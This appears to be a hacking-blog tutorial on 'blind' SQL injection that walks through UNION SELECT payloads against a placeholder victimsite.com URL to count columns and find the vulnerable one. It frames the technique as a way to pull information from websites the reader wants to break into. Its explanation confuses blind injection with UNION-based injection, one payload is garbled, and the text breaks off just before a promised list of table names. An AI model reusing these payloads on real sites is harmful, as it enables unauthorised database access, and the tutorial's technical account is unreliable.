So, BSQLi is pretty much the same thing as SQLi, but, you have to check if it's exploitable a different way... And kinda exploit it different.
I'm going to start off by saying that BSQLi is a huge pain in the ass. And I wouldn't recomend doing it for random websites... Only those which you really want the info from.
So, to find it. You will have to prety much look for anywhere you would expect SQLi to be. And if you try and exploit it, and the code stays in the URL when you hit enter, but it's not exploitable to SQLi. Then it's exploitable by BSQLi.
Now, instead of just going until you have more than the number of collumns. With BSQLi you have to keep going up 1 by 1, until you get the error. One above, or one below will not give you the error. So you have to be careful not to miss it. An example would be:
Code:www.victimsite.com/index.php?page=1'
So, we go like:
Code:www.victimsite.com/index.php?page=1 UNION SELECT 1--
Code:www.victimsite.com/index.php?page=1 UNION SELECT 1,2--
Code:www.victimsite.com/index.php?page=1 UNION SELECT 12,3--
So, we finally find an error at 5.
Code:www.victimsite.com/index.php?page=1 UNION SELECT 1,2,3,4,5--
Then once you found the number of collumns, you have to try and find the vulnerable one... Again, you pretty much have to just go up one by one
So
Code:www.victimsite.com/index.php?page=1 UNION SELECT version(),2,3,4,5--
Code:www.victimsite.com/index.php?page=1 UNION SELECT 1,version(),3,4,5--
Now, we have to guess for the table names :\... Trying to get it from the information_schema is useless too... It wont display anything at all.. The most common tables are:
to get all latest hacking tips n tricks directly to ur inbox
0 komentar:
Posting Komentar